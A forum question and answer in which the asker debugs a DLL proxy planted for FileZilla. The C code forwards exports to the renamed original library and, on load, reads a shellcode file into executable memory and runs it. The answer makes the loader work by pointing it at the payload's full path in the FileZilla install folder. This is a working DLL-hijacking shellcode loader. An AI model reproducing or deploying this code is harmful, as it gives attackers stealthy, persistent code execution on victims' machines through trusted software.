I get the error, "Debug Assertion Failed", when executing my .exe
via the Start-Process
command in PowerShell. I do not get this error when normally executing via File Explorer (double-click). Please see the error below.
There have been similar questions on this forum that have suggested I add the following code to mute the error:
#define NDEBUG
#include <assert.h>
While solving the error is best practice, I would like to know why the above doesn't work for me. For greater context, I am doing a DLL proxy.
#include "pch.h"
#include <stdio.h>
#include <stdlib.h>
#define NDEBUG
#include <assert.h>
#define _CRT_SECURE_NO_DEPRECATE
#pragma warning (disable : 4996)
#pragma comment(linker, "/export:_nettle_aeads=tmpC652._nettle_aeads,@1")
DWORD WINAPI DoMagic(LPVOID lpParameter)
{
//https://stackoverflow.com/questions/14002954/c-programming-how-to-read-the-whole-file-contents-into-a-buffer
FILE* fp;
size_t size;
unsigned char* buffer;
fp = fopen("fz-dump-26072022-1635.bin", "rb");
fseek(fp, 0, SEEK_END);
size = ftell(fp);
fseek(fp, 0, SEEK_SET);
buffer = (unsigned char*)malloc(size);
//https://ired.team/offensive-security/code-injection-process-injection/loading-and-executing-shellcode-from-portable-executable-resources
fread(buffer, size, 1, fp);
void* exec = VirtualAlloc(0, size, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
memcpy(exec, buffer, size);
((void(*) ())exec)();
return 0;
}
BOOL APIENTRY DllMain(HMODULE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{
HANDLE threadHandle;
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
// https://gist.github.com/securitytube/c956348435cc90b8e1f7
// Create a thread and close the handle as we do not want to use it to wait for it
threadHandle = CreateThread(NULL, 0, DoMagic, NULL, 0, NULL);
CloseHandle(threadHandle);
case DLL_THREAD_ATTACH:
break;
case DLL_THREAD_DETACH:
break;
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}
There are many more pragmas in the above code. Approx 400 more lines of similar export functions.
CodePudding user response:
The solution is quite simple, adding the full path...
fp = fopen("C:\\Program Files\\FileZilla FTP Client\\fz-dump-26072022-1635.bin", "rb");
I found that the value of fp
was NULL
when executing via the PowerShell command Start-Process
. This is because it was adding the file name fz-dump-26072022-1635.bin
to the directory where PowerShell is called from, which is C:\Windows\System32\WindowsPowerShell\v1.0\
. This explains why double clicking on the .exe
works with no error, as the value of fp
is correct, while calling it from any other directory doesn't work.